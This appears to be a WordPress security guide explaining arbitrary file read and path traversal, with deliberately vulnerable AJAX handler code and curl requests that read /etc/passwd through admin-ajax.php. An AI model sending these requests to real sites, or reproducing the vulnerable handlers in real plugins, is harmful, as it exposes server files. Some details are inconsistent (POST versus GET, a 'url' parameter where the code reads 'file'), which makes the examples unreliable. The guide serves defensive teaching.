Arbitrary File Read

Introduction

This article covers cases of possible Arbitrary File Read on WordPress. This includes improper file fetch handling inside of the plugin/theme which can be used to read arbitrary local files inside of the server.

Learn how to secure your code against Arbitrary File Read

Useful Functions

Several functions could be useful to identify a possible Arbitrary File Read vulnerability:

• PHP related

  • file_get_contents
  • readfile
  • fopen
  • fread
  • fgets
  • fgetcsv
  • fgetss deprecated from PHP 7.3
  • file
  • cURL

• WordPress related

  • WP_Filesystem_Direct::get_contents
  • WP_Filesystem_Direct::get_contents_array

Example Cases

Below is an example of vulnerable code:

add_action("wp_ajax_get_file", "ajax_get_file");

public function ajax_get_file(){
    global $wp_filesystem;

    // Make sure that the above variable is properly setup.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    WP_Filesystem();

    $url = $_GET["url"];
    $data = $wp_filesystem->get_contents($url);
    $data = json_encode( $data );
    echo $data;
    die();
}

To exploit this, any authenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint specifying the needed parameter to trigger the WP_Filesystem_Direct::get_contents function.

curl '<WORDPRESS_BASE_URL/wp-admin/admin-ajax.php?action=get_file&url=/etc/passwd' -H 'Cookie: <AUTHENTICATED_USER_COOKIE>'

Below are some of the findings related to Arbitrary File Read:

• Critical Vulnerabilities Patched in WordPress Automatic Plugin

Path Traversal

Path traversal is a vulnerability that allows attackers to access files outside the intended directory by traversing file paths. Path traversal can be used to exploit the arbitrary file read when the file read is limited to a specific directory.

Example Cases

Below is an example of vulnerable code:

add_action("wp_ajax_get_file_of_a_directory", "get_file_of_a_directory");

public function get_file_of_a_directory(){

    $file = $_GET["file"];
    $file_content = file_get_contents(get_template_directory(). $file);
    echo $file_content;
}

To exploit this, any authenticated user needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint. The value of the $_GET['file'] should be traversed backward using /../../ to access the files in another directory.

curl '<WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=get_file_of_a_directory&url=/../../../../../../../etc/passwd' -H 'Cookie: <AUTHENTICATED_USER_COOKIE>'